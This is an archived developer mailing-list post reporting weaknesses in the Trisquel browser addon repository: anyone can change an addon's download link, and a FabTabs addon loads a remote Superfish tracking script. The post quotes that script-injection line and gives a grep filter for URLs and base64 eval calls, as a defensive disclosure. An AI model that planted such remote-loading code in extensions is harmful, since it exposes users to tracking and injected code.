[Trisquel-devel] Trisquel addon repository has security risks

Luke gaming4jc2 at yahoo.com
Sun Jan 5 19:41:37 CET 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Friendly reminder: FabTab addon is still up and this is still an issue.

On 12/01/13 12:51, Luke wrote:
> Hello, I have noticed that the Trisquel aBrowser addon repository
> is susceptible to several threat vectors.
> 
> 1) Random users signing up and changing the download location of
> .xpi files. This could be used to inject malicious code to
> unknowing users.
> 
> Solution: a) Assign moderators who will check addons for approval
> similar to AMO before going live.
> 
> b) Whitelist certain domains, e.g. only allow the url to contains 
> download links from "https://addons.mozilla.org" since they are 
> generally being checked by others.
> 
> 2) Non-free blobs can still exists in supposedly free code and must
> be reviewed. Taking for example a recent finding in FabTabs: 
> https://trisquel.info/en/browser/addons/fabtabs
> 
> While manually inspecting the code I found this interesting line 
> located in "/chrome/content/fabtab/content.js": script.src = 
> 'http://www.superfish.com/ws/sf_main.jsp?dlsource=fgzqxwui&userId=c4aa8323-83ff-4385-a2df-d45f8c1ce97a&CTID=fabtab';
>
>  This code appears to be a web-beacon and directly links to
> non-free code outside of the original xpi! Thankfully this outside
> code appears only to have analytic/tracking built in and not actual
> malicious intent other than ensuring HTTPS is OFF whenever it
> queries the beacon (contains url rewrites). However this opens the
> door for much larger problems. Someone should be proactively
> studying extensions prior to upload, and/or implement a small
> filter which can catch certain artifacts at minimum.
> 
> One such make-shift bash script I whipped up (could use some
> work):
> 
> unzip -p *.xpi | cat | grep
> "http://\|https://\|eval(base64_decode"
> 
> This outputs all links and any base64 found inside of an xpi to
> the terminal, and can catch the superfish web beacon.
> 
> 
> Just some thoughts. :)
> 
> 
> 
> 

-----BEGIN PGP SIGNATURE-----

iQEcBAEBAgAGBQJSyadhAAoJEJ6DCuZ5py6jnzwH/3dkPrdGjgMToZLpBVobr8JJ
p2gf8OCZVWnzm1MYASjcwHlND/JIuPbbwnOiiXagPZZahF0oZAdO608oyyM5dee+
hjQdQoQXmrsoI1uB5T0AXJH1/4fBROxJkslWJyMkYJUigqUnfLpxLUAPLQGzx0Ke
x8Wlx10s/viXhHeo7upldqz0kxEXKoh4yhLHFyFXJgZu+1Xf7mMVssowCMdhbhSU
qh47YWSItkRR/3mWBHOWnzxbDGVuEAf5vhLCv8qKu9mIR4y92iyYMCkZq+qXxYOH
2tF2yPq/o2e3IIk78SszjN4fRpeYbrGTtftxY+J9GLa/hYL8kv6nk80yfNlyJKY=
=cgDN
-----END PGP SIGNATURE-----


More information about the Trisquel-devel mailing list